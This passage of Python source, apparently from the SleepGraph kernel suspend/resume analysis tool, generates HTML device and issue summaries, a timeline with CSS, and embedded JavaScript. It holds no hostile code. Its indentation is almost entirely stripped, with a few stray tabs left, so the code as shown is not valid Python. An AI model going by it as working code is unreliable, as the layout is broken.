hf.write(html+'</table>\n</body>\n</html>\n')
hf.close()
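# Function: createHTMLDeviceSummary
# Description:
#	 Create a summary html file of the average and worst device times
#	 accumulated over a series of tests
# Arguments:
#	 testruns: array of test data dictionaries
#	 htmlfile: the output html file name
#	 title: the text for the page header
# Output:
#	 The global device list dictionary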
def createHTMLDeviceSummary(testruns, htmlfile, title):
html = summaryCSS('Device Summary - SleepGraph', False)
# create global device list from all tests
devall = dict()
for data in testruns:
host, url, devlist = data['host'], data['url'], data['devlist']
for type in devlist:
if type not in devall:
devall[type] = dict()
mdevlist, devlist = devall[type], data['devlist'][type]
for name in devlist:
length = devlist[name]
if name not in mdevlist:
mdevlist[name] = {'name': name, 'host': host,
'worst': length, 'total': length, 'count': 1,
'url': url}
else:
if length > mdevlist[name]['worst']:
mdevlist[name]['worst'] = length
mdevlist[name]['url'] = url
mdevlist[name]['host'] = host
mdevlist[name]['total'] += length
mdevlist[name]['count'] += 1
# generate the html
th = '\t<th>{0}</th>\n'
td = '\t<td align=center>{0}</td>\n'
tdr = '\t<td align=right>{0}</td>\n'
tdlink = '\t<td align=center><a href="{0}">html</a></td>\n'
limit = 1
for type in sorted(devall, reverse=True):
num = 0
devlist = devall[type]
# table header
html += '<div class="stamp">%s (%s devices > %d ms)</div><table>\n' % \
(title, type.upper(), limit)
html += '<tr>\n' + '<th align=right>Device Name</th>' +\
th.format('Average Time') + th.format('Count') +\
th.format('Worst Time') + th.format('Host (worst time)') +\
th.format('Link (worst time)') + '</tr>\n'
for name in sorted(devlist, key=lambda k:(devlist[k]['worst'], \
devlist[k]['total'], devlist[k]['name']), reverse=True):
data = devall[type][name]
data['average'] = data['total'] / data['count']
if data['average'] < limit:
continue
# row classes - alternate row color
rcls = ['alt'] if num % 2 == 1 else []
html += '<tr class="'+(' '.join(rcls))+'">\n' if len(rcls) > 0 else '<tr>\n'
html += tdr.format(data['name']) # name
html += td.format('%.3f ms' % data['average']) # average
html += td.format(data['count']) # count
html += td.format('%.3f ms' % data['worst']) # worst
html += td.format(data['host']) # host
html += tdlink.format(data['url']) # url
html += '</tr>\n'
num += 1
html += '</table>\n'
# flush the data to file
hf = open(htmlfile, 'w')
hf.write(html+'</body>\n</html>\n')
hf.close()
return devall
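# Function: createHTMLIssuesSummary
# Description:
#	 Create a summary html file of the kernel issues found in a series of tests
# Arguments:
#	 testruns: array of test data dictionaries
#	 issues: array of issue dictionaries (line, count, urls)
#	 htmlfile: the output html file name
#	 title: the text for the page header
#	 extra: optional html appended before the body close tag
# Output:
#	 The issues list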
def createHTMLIssuesSummary(testruns, issues, htmlfile, title, extra=''):
multihost = len([e for e in issues if len(e['urls']) > 1]) > 0
html = summaryCSS('Issues Summary - SleepGraph', False)
total = len(testruns)
# generate the html
th = '\t<th>{0}</th>\n'
td = '\t<td align={0}>{1}</td>\n'
tdlink = '<a href="{1}">{0}</a>'
subtitle = '%d issues' % len(issues) if len(issues) > 0 else 'no issues'
html += '<div class="stamp">%s (%s)</div><table>\n' % (title, subtitle)
html += '<tr>\n' + th.format('Issue') + th.format('Count')
if multihost:
html += th.format('Hosts')
html += th.format('Tests') + th.format('Fail Rate') +\
th.format('First Instance') + '</tr>\n'
num = 0
for e in sorted(issues, key=lambda v:v['count'], reverse=True):
testtotal = 0
links = []
for host in sorted(e['urls']):
links.append(tdlink.format(host, e['urls'][host][0]))
testtotal += len(e['urls'][host])
rate = '%d/%d (%.2f%%)' % (testtotal, total, 100*float(testtotal)/float(total))
# row classes - alternate row color
rcls = ['alt'] if num % 2 == 1 else []
html += '<tr class="'+(' '.join(rcls))+'">\n' if len(rcls) > 0 else '<tr>\n'
html += td.format('left', e['line']) # issue
html += td.format('center', e['count']) # count
if multihost:
html += td.format('center', len(e['urls'])) # hosts
html += td.format('center', testtotal) # test count
html += td.format('center', rate) # test rate
html += td.format('center nowrap', '<br>'.join(links)) # links
html += '</tr>\n'
num += 1
# flush the data to file
hf = open(htmlfile, 'w')
hf.write(html+'</table>\n'+extra+'</body>\n</html>\n')
hf.close()
return issues
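# Function: ordinal
# Description:
#	 Convert an integer into its ordinal string, e.g. 1 -> "1st", 2 -> "2nd"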
def ordinal(value):
suffix = 'th'
	# 11 through 13 (and 111 through 113, etc) always use the 'th' suffix
	if value % 100 < 10 or value % 100 > 19:
if value % 10 == 1:
suffix = 'st'
elif value % 10 == 2:
suffix = 'nd'
elif value % 10 == 3:
suffix = 'rd'
return '%d%s' % (value, suffix)
# Function: createHTML
# Description:
# Create the output html file from the resident test data
# Arguments:
# testruns: array of Data objects from parseKernelLog or parseTraceLog
# Output:
# True if the html file was created, false if it failed
def createHTML(testruns, testfail):
if len(testruns) < 1:
pprint('ERROR: Not enough test data to build a timeline')
return
kerror = False
for data in testruns:
if data.kerror:
kerror = True
if(sysvals.suspendmode in ['freeze', 'standby']):
data.trimFreezeTime(testruns[-1].tSuspended)
else:
data.getMemTime()
# html function templates
html_error = '<div id="{1}" title="kernel error/warning" class="err" style="right:{0}%">{2}→</div>\n'
html_traceevent = '<div title="{0}" class="traceevent{6}" style="left:{1}%;top:{2}px;height:{3}px;width:{4}%;line-height:{3}px;{7}">{5}</div>\n'
html_cpuexec = '<div class="jiffie" style="left:{0}%;top:{1}px;height:{2}px;width:{3}%;background:{4};"></div>\n'
html_timetotal = '<table class="time1">\n<tr>'\
'<td class="green" title="{3}">{2} Suspend Time: <b>{0} ms</b></td>'\
'<td class="yellow" title="{4}">{2} Resume Time: <b>{1} ms</b></td>'\
'</tr>\n</table>\n'
html_timetotal2 = '<table class="time1">\n<tr>'\
'<td class="green" title="{4}">{3} Suspend Time: <b>{0} ms</b></td>'\
'<td class="gray" title="time spent in low-power mode with clock running">'+sysvals.suspendmode+' time: <b>{1} ms</b></td>'\
'<td class="yellow" title="{5}">{3} Resume Time: <b>{2} ms</b></td>'\
'</tr>\n</table>\n'
html_timetotal3 = '<table class="time1">\n<tr>'\
'<td class="green">Execution Time: <b>{0} ms</b></td>'\
'<td class="yellow">Command: <b>{1}</b></td>'\
'</tr>\n</table>\n'
html_fail = '<table class="testfail"><tr><td>{0}</td></tr></table>\n'
html_kdesc = '<td class="{3}" title="time spent in kernel execution">{0}Kernel {2}: {1} ms</td>'
html_fwdesc = '<td class="{3}" title="time spent in firmware">{0}Firmware {2}: {1} ms</td>'
html_wifdesc = '<td class="yellow" title="time for wifi to reconnect after resume complete ({2})">{0}Wifi Resume: {1}</td>'
# html format variables
scaleH = 20
if kerror:
scaleH = 40
# device timeline
devtl = Timeline(30, scaleH)
# write the test title and general info header
devtl.createHeader(sysvals, testruns[0].stamp)
# Generate the header for this timeline
for data in testruns:
tTotal = data.end - data.start
if(tTotal == 0):
doError('No timeline data')
if sysvals.suspendmode == 'command':
run_time = '%.0f' % (tTotal * 1000)
if sysvals.testcommand:
testdesc = sysvals.testcommand
else:
testdesc = 'unknown'
if(len(testruns) > 1):
testdesc = ordinal(data.testnumber+1)+' '+testdesc
thtml = html_timetotal3.format(run_time, testdesc)
devtl.html += thtml
continue
# typical full suspend/resume header
stot, rtot = sktime, rktime = data.getTimeValues()
ssrc, rsrc, testdesc, testdesc2 = ['kernel'], ['kernel'], 'Kernel', ''
if data.fwValid:
stot += (data.fwSuspend/1000000.0)
rtot += (data.fwResume/1000000.0)
ssrc.append('firmware')
rsrc.append('firmware')
testdesc = 'Total'
if 'time' in data.wifi and data.wifi['stat'] != 'timeout':
rtot += data.end - data.tKernRes + (data.wifi['time'] * 1000.0)
rsrc.append('wifi')
testdesc = 'Total'
suspend_time, resume_time = '%.3f' % stot, '%.3f' % rtot
stitle = 'time from kernel suspend start to %s mode [%s time]' % \
(sysvals.suspendmode, ' & '.join(ssrc))
rtitle = 'time from %s mode to kernel resume complete [%s time]' % \
(sysvals.suspendmode, ' & '.join(rsrc))
if(len(testruns) > 1):
testdesc = testdesc2 = ordinal(data.testnumber+1)
testdesc2 += ' '
if(len(data.tLow) == 0):
thtml = html_timetotal.format(suspend_time, \
resume_time, testdesc, stitle, rtitle)
else:
low_time = '+'.join(data.tLow)
thtml = html_timetotal2.format(suspend_time, low_time, \
resume_time, testdesc, stitle, rtitle)
devtl.html += thtml
if not data.fwValid and 'dev' not in data.wifi:
continue
# extra detail when the times come from multiple sources
thtml = '<table class="time2">\n<tr>'
thtml += html_kdesc.format(testdesc2, '%.3f'%sktime, 'Suspend', 'green')
if data.fwValid:
sftime = '%.3f'%(data.fwSuspend / 1000000.0)
rftime = '%.3f'%(data.fwResume / 1000000.0)
thtml += html_fwdesc.format(testdesc2, sftime, 'Suspend', 'green')
thtml += html_fwdesc.format(testdesc2, rftime, 'Resume', 'yellow')
thtml += html_kdesc.format(testdesc2, '%.3f'%rktime, 'Resume', 'yellow')
if 'time' in data.wifi:
if data.wifi['stat'] != 'timeout':
wtime = '%.0f ms'%(data.end - data.tKernRes + (data.wifi['time'] * 1000.0))
else:
wtime = 'TIMEOUT'
thtml += html_wifdesc.format(testdesc2, wtime, data.wifi['dev'])
thtml += '</tr>\n</table>\n'
devtl.html += thtml
if testfail:
devtl.html += html_fail.format(testfail)
# time scale for potentially multiple datasets
t0 = testruns[0].start
tMax = testruns[-1].end
tTotal = tMax - t0
# determine the maximum number of rows we need to draw
fulllist = []
threadlist = []
pscnt = 0
devcnt = 0
for data in testruns:
data.selectTimelineDevices('%f', tTotal, sysvals.mindevlen)
for group in data.devicegroups:
devlist = []
for phase in group:
for devname in sorted(data.tdevlist[phase]):
d = DevItem(data.testnumber, phase, data.dmesg[phase]['list'][devname])
devlist.append(d)
if d.isa('kth'):
threadlist.append(d)
else:
if d.isa('ps'):
pscnt += 1
else:
devcnt += 1
fulllist.append(d)
if sysvals.mixedphaseheight:
devtl.getPhaseRows(devlist)
if not sysvals.mixedphaseheight:
if len(threadlist) > 0 and len(fulllist) > 0:
if pscnt > 0 and devcnt > 0:
msg = 'user processes & device pm callbacks'
elif pscnt > 0:
msg = 'user processes'
else:
msg = 'device pm callbacks'
d = testruns[0].addHorizontalDivider(msg, testruns[-1].end)
fulllist.insert(0, d)
devtl.getPhaseRows(fulllist)
if len(threadlist) > 0:
d = testruns[0].addHorizontalDivider('asynchronous kernel threads', testruns[-1].end)
threadlist.insert(0, d)
devtl.getPhaseRows(threadlist, devtl.rows)
devtl.calcTotalRows()
# draw the full timeline
devtl.createZoomBox(sysvals.suspendmode, len(testruns))
for data in testruns:
# draw each test run and block chronologically
phases = {'suspend':[],'resume':[]}
for phase in data.sortedPhases():
if data.dmesg[phase]['start'] >= data.tSuspended:
phases['resume'].append(phase)
else:
phases['suspend'].append(phase)
# now draw the actual timeline blocks
for dir in phases:
# draw suspend and resume blocks separately
bname = '%s%d' % (dir[0], data.testnumber)
if dir == 'suspend':
m0 = data.start
mMax = data.tSuspended
left = '%f' % (((m0-t0)*100.0)/tTotal)
else:
m0 = data.tSuspended
mMax = data.end
# in an x2 run, remove any gap between blocks
if len(testruns) > 1 and data.testnumber == 0:
mMax = testruns[1].start
left = '%f' % ((((m0-t0)*100.0)+sysvals.srgap/2)/tTotal)
mTotal = mMax - m0
# if a timeline block is 0 length, skip altogether
if mTotal == 0:
continue
width = '%f' % (((mTotal*100.0)-sysvals.srgap/2)/tTotal)
devtl.html += devtl.html_tblock.format(bname, left, width, devtl.scaleH)
for b in phases[dir]:
# draw the phase color background
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%f' % (((phase['start']-m0)*100.0)/mTotal)
width = '%f' % ((length*100.0)/mTotal)
devtl.html += devtl.html_phase.format(left, width, \
'%.3f'%devtl.scaleH, '%.3f'%devtl.bodyH, \
data.dmesg[b]['color'], '')
for e in data.errorinfo[dir]:
# draw red lines for any kernel errors found
type, t, idx1, idx2 = e
id = '%d_%d' % (idx1, idx2)
right = '%f' % (((mMax-t)*100.0)/mTotal)
devtl.html += html_error.format(right, id, type)
for b in phases[dir]:
# draw the devices for this phase
phaselist = data.dmesg[b]['list']
for d in sorted(data.tdevlist[b]):
dname = d if ('[' not in d or 'CPU' in d) else d.split('[')[0]
name, dev = dname, phaselist[d]
drv = xtraclass = xtrainfo = xtrastyle = ''
if 'htmlclass' in dev:
xtraclass = dev['htmlclass']
if 'color' in dev:
xtrastyle = 'background:%s;' % dev['color']
if(d in sysvals.devprops):
name = sysvals.devprops[d].altName(d)
xtraclass = sysvals.devprops[d].xtraClass()
xtrainfo = sysvals.devprops[d].xtraInfo()
elif xtraclass == ' kth':
xtrainfo = ' kernel_thread'
if('drv' in dev and dev['drv']):
drv = ' {%s}' % dev['drv']
rowheight = devtl.phaseRowHeight(data.testnumber, b, dev['row'])
rowtop = devtl.phaseRowTop(data.testnumber, b, dev['row'])
top = '%.3f' % (rowtop + devtl.scaleH)
left = '%f' % (((dev['start']-m0)*100)/mTotal)
width = '%f' % (((dev['end']-dev['start'])*100)/mTotal)
length = ' (%0.3f ms) ' % ((dev['end']-dev['start'])*1000)
title = name+drv+xtrainfo+length
if sysvals.suspendmode == 'command':
title += sysvals.testcommand
elif xtraclass == ' ps':
if 'suspend' in b:
title += 'pre_suspend_process'
else:
title += 'post_resume_process'
else:
title += b
devtl.html += devtl.html_device.format(dev['id'], \
title, left, top, '%.3f'%rowheight, width, \
dname+drv, xtraclass, xtrastyle)
if('cpuexec' in dev):
for t in sorted(dev['cpuexec']):
start, end = t
j = float(dev['cpuexec'][t]) / 5
if j > 1.0:
j = 1.0
height = '%.3f' % (rowheight/3)
top = '%.3f' % (rowtop + devtl.scaleH + 2*rowheight/3)
left = '%f' % (((start-m0)*100)/mTotal)
width = '%f' % ((end-start)*100/mTotal)
color = 'rgba(255, 0, 0, %f)' % j
devtl.html += \
html_cpuexec.format(left, top, height, width, color)
if('src' not in dev):
continue
# draw any trace events for this device
for e in dev['src']:
if e.length == 0:
continue
height = '%.3f' % devtl.rowH
top = '%.3f' % (rowtop + devtl.scaleH + (e.row*devtl.rowH))
left = '%f' % (((e.time-m0)*100)/mTotal)
width = '%f' % (e.length*100/mTotal)
xtrastyle = ''
if e.color:
xtrastyle = 'background:%s;' % e.color
devtl.html += \
html_traceevent.format(e.title(), \
left, top, height, width, e.text(), '', xtrastyle)
# draw the time scale, try to make the number of labels readable
devtl.createTimeScale(m0, mMax, tTotal, dir)
devtl.html += '</div>\n'
# timeline is finished
devtl.html += '</div>\n</div>\n'
# draw a legend which describes the phases by color
if sysvals.suspendmode != 'command':
phasedef = testruns[-1].phasedef
devtl.html += '<div class="legend">\n'
pdelta = 100.0/len(phasedef.keys())
pmargin = pdelta / 4.0
for phase in sorted(phasedef, key=lambda k:phasedef[k]['order']):
id, p = '', phasedef[phase]
for word in phase.split('_'):
id += word[0]
order = '%.2f' % ((p['order'] * pdelta) + pmargin)
name = phase.replace('_', ' ')
devtl.html += devtl.html_legend.format(order, p['color'], name, id)
devtl.html += '</div>\n'
hf = open(sysvals.htmlfile, 'w')
addCSS(hf, sysvals, len(testruns), kerror)
# write the device timeline
hf.write(devtl.html)
hf.write('<div id="devicedetailtitle"></div>\n')
hf.write('<div id="devicedetail" style="display:none;">\n')
# draw the colored boxes for the device detail section
for data in testruns:
hf.write('<div id="devicedetail%d">\n' % data.testnumber)
pscolor = 'linear-gradient(to top left, #ccc, #eee)'
hf.write(devtl.html_phaselet.format('pre_suspend_process', \
'0', '0', pscolor))
for b in data.sortedPhases():
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%.3f' % (((phase['start']-t0)*100.0)/tTotal)
width = '%.3f' % ((length*100.0)/tTotal)
hf.write(devtl.html_phaselet.format(b, left, width, \
data.dmesg[b]['color']))
hf.write(devtl.html_phaselet.format('post_resume_process', \
'0', '0', pscolor))
if sysvals.suspendmode == 'command':
hf.write(devtl.html_phaselet.format('cmdexec', '0', '0', pscolor))
hf.write('</div>\n')
hf.write('</div>\n')
# write the ftrace data (callgraph)
if sysvals.cgtest >= 0 and len(testruns) > sysvals.cgtest:
data = testruns[sysvals.cgtest]
else:
data = testruns[-1]
if sysvals.usecallgraph:
addCallgraphs(sysvals, hf, data)
# add the test log as a hidden div
if sysvals.testlog and sysvals.logmsg:
hf.write('<div id="testlog" style="display:none;">\n'+sysvals.logmsg+'</div>\n')
# add the dmesg log as a hidden div
if sysvals.dmesglog and sysvals.dmesgfile:
hf.write('<div id="dmesglog" style="display:none;">\n')
lf = sysvals.openlog(sysvals.dmesgfile, 'r')
for line in lf:
			line = line.replace('<', '&lt;').replace('>', '&gt;')
hf.write(line)
lf.close()
hf.write('</div>\n')
# add the ftrace log as a hidden div
if sysvals.ftracelog and sysvals.ftracefile:
hf.write('<div id="ftracelog" style="display:none;">\n')
lf = sysvals.openlog(sysvals.ftracefile, 'r')
for line in lf:
hf.write(line)
lf.close()
hf.write('</div>\n')
# write the footer and close
addScriptCode(hf, testruns)
hf.write('</body>\n</html>\n')
hf.close()
return True
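# Function: addCSS
# Description:
#	 Write the html header and css needed for the timeline html file
# Arguments:
#	 hf: the open html file pointer
#	 sv: the sysvals object
#	 testcount: the number of test runs included in the timeline
#	 kerror: True if kernel errors need to be displayed
#	 extra: optional additional css rules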
def addCSS(hf, sv, testcount=1, kerror=False, extra=''):
kernel = sv.stamp['kernel']
host = sv.hostname[0].upper()+sv.hostname[1:]
mode = sv.suspendmode
if sv.suspendmode in suspendmodename:
mode = suspendmodename[sv.suspendmode]
title = host+' '+mode+' '+kernel
# various format changes by flags
cgchk = 'checked'
cgnchk = 'not(:checked)'
if sv.cgexp:
cgchk = 'not(:checked)'
cgnchk = 'checked'
hoverZ = 'z-index:8;'
if sv.usedevsrc:
hoverZ = ''
devlistpos = 'absolute'
if testcount > 1:
devlistpos = 'relative'
scaleTH = 20
if kerror:
scaleTH = 60
# write the html header first (html head, css code, up to body start)
html_header = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>'+title+'</title>\n\
<style type=\'text/css\'>\n\
body {overflow-y:scroll;}\n\
.stamp {width:100%;text-align:center;background:gray;line-height:30px;color:white;font:25px Arial;}\n\
.stamp.sysinfo {font:10px Arial;}\n\
.callgraph {margin-top:30px;box-shadow:5px 5px 20px black;}\n\
.callgraph article * {padding-left:28px;}\n\
h1 {color:black;font:bold 30px Times;}\n\
t0 {color:black;font:bold 30px Times;}\n\
t1 {color:black;font:30px Times;}\n\
t2 {color:black;font:25px Times;}\n\
t3 {color:black;font:20px Times;white-space:nowrap;}\n\
t4 {color:black;font:bold 30px Times;line-height:60px;white-space:nowrap;}\n\
cS {font:bold 13px Times;}\n\
table {width:100%;}\n\
.gray {background:rgba(80,80,80,0.1);}\n\
.green {background:rgba(204,255,204,0.4);}\n\
.purple {background:rgba(128,0,128,0.2);}\n\
.yellow {background:rgba(255,255,204,0.4);}\n\
.blue {background:rgba(169,208,245,0.4);}\n\
.time1 {font:22px Arial;border:1px solid;}\n\
.time2 {font:15px Arial;border-bottom:1px solid;border-left:1px solid;border-right:1px solid;}\n\
.testfail {font:bold 22px Arial;color:red;border:1px dashed;}\n\
td {text-align:center;}\n\
r {color:#500000;font:15px Tahoma;}\n\
n {color:#505050;font:15px Tahoma;}\n\
.tdhl {color:red;}\n\
.hide {display:none;}\n\
.pf {display:none;}\n\
.pf:'+cgchk+' + label {background:url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/><rect x="8" y="4" width="2" height="10" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:'+cgnchk+' ~ label {background:url(\'data:image/svg+xml;utf,<?xml version="1.0" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" height="18" width="18" version="1.1"><circle cx="9" cy="9" r="8" stroke="black" stroke-width="1" fill="white"/><rect x="4" y="8" width="10" height="2" style="fill:black;stroke-width:0"/></svg>\') no-repeat left center;}\n\
.pf:'+cgchk+' ~ *:not(:nth-child(2)) {display:none;}\n\
.zoombox {position:relative;width:100%;overflow-x:scroll;-webkit-user-select:none;-moz-user-select:none;user-select:none;}\n\
.timeline {position:relative;font-size:14px;cursor:pointer;width:100%; overflow:hidden;background:linear-gradient(#cccccc, white);}\n\
.thread {position:absolute;height:0%;overflow:hidden;z-index:7;line-height:30px;font-size:14px;border:1px solid;text-align:center;white-space:nowrap;}\n\
.thread.ps {border-radius:3px;background:linear-gradient(to top, #ccc, #eee);}\n\
.thread:hover {background:white;border:1px solid red;'+hoverZ+'}\n\
.thread.sec,.thread.sec:hover {background:black;border:0;color:white;line-height:15px;font-size:10px;}\n\
.hover {background:white;border:1px solid red;'+hoverZ+'}\n\
.hover.sync {background:white;}\n\
.hover.bg,.hover.kth,.hover.sync,.hover.ps {background:white;}\n\
.jiffie {position:absolute;pointer-events: none;z-index:8;}\n\
.traceevent {position:absolute;font-size:10px;z-index:7;overflow:hidden;color:black;text-align:center;white-space:nowrap;border-radius:5px;border:1px solid black;background:linear-gradient(to bottom right,#CCC,#969696);}\n\
.traceevent:hover {color:white;font-weight:bold;border:1px solid white;}\n\
.phase {position:absolute;overflow:hidden;border:0px;text-align:center;}\n\
.phaselet {float:left;overflow:hidden;border:0px;text-align:center;min-height:100px;font-size:24px;}\n\
.t {position:absolute;line-height:'+('%d'%scaleTH)+'px;pointer-events:none;top:0;height:100%;border-right:1px solid black;z-index:6;}\n\
.err {position:absolute;top:0%;height:100%;border-right:3px solid red;color:red;font:bold 14px Times;line-height:18px;}\n\
.legend {position:relative; width:100%; height:40px; text-align:center;margin-bottom:20px}\n\
.legend .square {position:absolute;cursor:pointer;top:10px; width:0px;height:20px;border:1px solid;padding-left:20px;}\n\
button {height:40px;width:200px;margin-bottom:20px;margin-top:20px;font-size:24px;}\n\
.btnfmt {position:relative;float:right;height:25px;width:auto;margin-top:3px;margin-bottom:0;font-size:10px;text-align:center;}\n\
.devlist {position:'+devlistpos+';width:190px;}\n\
a:link {color:white;text-decoration:none;}\n\
a:visited {color:white;}\n\
a:hover {color:white;}\n\
a:active {color:white;}\n\
.version {position:relative;float:left;color:white;font-size:10px;line-height:30px;margin-left:10px;}\n\
#devicedetail {min-height:100px;box-shadow:5px 5px 20px black;}\n\
.tblock {position:absolute;height:100%;background:#ddd;}\n\
.tback {position:absolute;width:100%;background:linear-gradient(#ccc, #ddd);}\n\
.bg {z-index:1;}\n\
'+extra+'\
</style>\n</head>\n<body>\n'
hf.write(html_header)
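# The .pf rules above implement a pure-CSS expander for the callgraph
# sections: a hidden checkbox is followed by a label (the +/- icon) and the
# collapsible content, and the :checked state drives the sibling selectors.
# A generic illustration of markup these rules would act on (shape only,
# not the exact html emitted elsewhere in this script):
#
#    <input type="checkbox" class="pf" id="f1" checked>
#    <label for="f1">some_function(1.234 ms @ 100.0 to 101.2)</label>
#    <article>...child call rows...</article>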
# Function: addScriptCode
# Description:
# Adds the javascript code to the output html
# Arguments:
# hf: the open html file pointer
# testruns: array of Data objects from parseKernelLog or parseTraceLog
def addScriptCode(hf, testruns):
t0 = testruns[0].start * 1000
tMax = testruns[-1].end * 1000
# create an array in javascript memory with the device details
detail = ' var devtable = [];\n'
for data in testruns:
topo = data.deviceTopology()
detail += ' devtable[%d] = "%s";\n' % (data.testnumber, topo)
detail += ' var bounds = [%f,%f];\n' % (t0, tMax)
# add the code which will manipulate the data in the browser
script_code = \
'<script type="text/javascript">\n'+detail+\
' var resolution = -1;\n'\
' var dragval = [0, 0];\n'\
' function redrawTimescale(t0, tMax, tS) {\n'\
' var rline = \'<div class="t" style="left:0;border-left:1px solid black;border-right:0;">\';\n'\
' var tTotal = tMax - t0;\n'\
' var list = document.getElementsByClassName("tblock");\n'\
' for (var i = 0; i < list.length; i++) {\n'\
' var timescale = list[i].getElementsByClassName("timescale")[0];\n'\
' var m0 = t0 + (tTotal*parseFloat(list[i].style.left)/100);\n'\
' var mTotal = tTotal*parseFloat(list[i].style.width)/100;\n'\
' var mMax = m0 + mTotal;\n'\
' var html = "";\n'\
' var divTotal = Math.floor(mTotal/tS) + 1;\n'\
' if(divTotal > 1000) continue;\n'\
' var divEdge = (mTotal - tS*(divTotal-1))*100/mTotal;\n'\
' var pos = 0.0, val = 0.0;\n'\
' for (var j = 0; j < divTotal; j++) {\n'\
' var htmlline = "";\n'\
' var mode = list[i].id[5];\n'\
' if(mode == "s") {\n'\
' pos = 100 - (((j)*tS*100)/mTotal) - divEdge;\n'\
' val = (j-divTotal+1)*tS;\n'\
' if(j == divTotal - 1)\n'\
' htmlline = \'<div class="t" style="right:\'+pos+\'%"><cS>S→</cS></div>\';\n'\
' else\n'\
' htmlline = \'<div class="t" style="right:\'+pos+\'%">\'+val+\'ms</div>\';\n'\
' } else {\n'\
' pos = 100 - (((j)*tS*100)/mTotal);\n'\
' val = (j)*tS;\n'\
' htmlline = \'<div class="t" style="right:\'+pos+\'%">\'+val+\'ms</div>\';\n'\
' if(j == 0)\n'\
' if(mode == "r")\n'\
' htmlline = rline+"<cS>←R</cS></div>";\n'\
' else\n'\
' htmlline = rline+"<cS>0ms</div>";\n'\
' }\n'\
' html += htmlline;\n'\
' }\n'\
' timescale.innerHTML = html;\n'\
' }\n'\
' }\n'\
' function zoomTimeline() {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var zoombox = document.getElementById("dmesgzoombox");\n'\
' var left = zoombox.scrollLeft;\n'\
' var val = parseFloat(dmesg.style.width);\n'\
' var newval = 100;\n'\
' var sh = window.outerWidth / 2;\n'\
' if(this.id == "zoomin") {\n'\
' newval = val * 1.2;\n'\
' if(newval > 910034) newval = 910034;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((left + sh) * newval / val) - sh;\n'\
' } else if (this.id == "zoomout") {\n'\
' newval = val / 1.2;\n'\
' if(newval < 100) newval = 100;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((left + sh) * newval / val) - sh;\n'\
' } else {\n'\
' zoombox.scrollLeft = 0;\n'\
' dmesg.style.width = "100%";\n'\
' }\n'\
' var tS = [10000, 5000, 2000, 1000, 500, 200, 100, 50, 20, 10, 5, 2, 1];\n'\
' var t0 = bounds[0];\n'\
' var tMax = bounds[1];\n'\
' var tTotal = tMax - t0;\n'\
' var wTotal = tTotal * 100.0 / newval;\n'\
' var idx = 7*window.innerWidth/1100;\n'\
' for(var i = 0; (i < tS.length)&&((wTotal / tS[i]) < idx); i++);\n'\
' if(i >= tS.length) i = tS.length - 1;\n'\
' if(tS[i] == resolution) return;\n'\
' resolution = tS[i];\n'\
' redrawTimescale(t0, tMax, tS[i]);\n'\
' }\n'\
' function deviceName(title) {\n'\
' var name = title.slice(0, title.indexOf(" ("));\n'\
' return name;\n'\
' }\n'\
' function deviceHover() {\n'\
' var name = deviceName(this.title);\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = deviceName(dev[i].title);\n'\
' var cname = dev[i].className.slice(dev[i].className.indexOf("thread"));\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' dev[i].className = "hover "+cname;\n'\
' } else {\n'\
' dev[i].className = cname;\n'\
' }\n'\
' }\n'\
' }\n'\
' function deviceUnhover() {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].className = dev[i].className.slice(dev[i].className.indexOf("thread"));\n'\
' }\n'\
' }\n'\
' function deviceTitle(title, total, cpu) {\n'\
' var prefix = "Total";\n'\
' if(total.length > 3) {\n'\
' prefix = "Average";\n'\
' total[1] = (total[1]+total[3])/2;\n'\
' total[2] = (total[2]+total[4])/2;\n'\
' }\n'\
' var devtitle = document.getElementById("devicedetailtitle");\n'\
' var name = deviceName(title);\n'\
' if(cpu >= 0) name = "CPU"+cpu;\n'\
' var driver = "";\n'\
' var tS = "<t2>(</t2>";\n'\
' var tR = "<t2>)</t2>";\n'\
' if(total[1] > 0)\n'\
' tS = "<t2>("+prefix+" Suspend:</t2><t0> "+total[1].toFixed(3)+" ms</t0> ";\n'\
' if(total[2] > 0)\n'\
' tR = " <t2>"+prefix+" Resume:</t2><t0> "+total[2].toFixed(3)+" ms<t2>)</t2></t0>";\n'\
' var s = title.indexOf("{");\n'\
' var e = title.indexOf("}");\n'\
' if((s >= 0) && (e >= 0))\n'\
' driver = title.slice(s+1, e) + " <t1>@</t1> ";\n'\
' if(total[1] > 0 && total[2] > 0)\n'\
' devtitle.innerHTML = "<t0>"+driver+name+"</t0> "+tS+tR;\n'\
' else\n'\
' devtitle.innerHTML = "<t0>"+title+"</t0>";\n'\
' return name;\n'\
' }\n'\
' function deviceDetail() {\n'\
' var devinfo = document.getElementById("devicedetail");\n'\
' devinfo.style.display = "block";\n'\
' var name = deviceName(this.title);\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var idlist = [];\n'\
' var pdata = [[]];\n'\
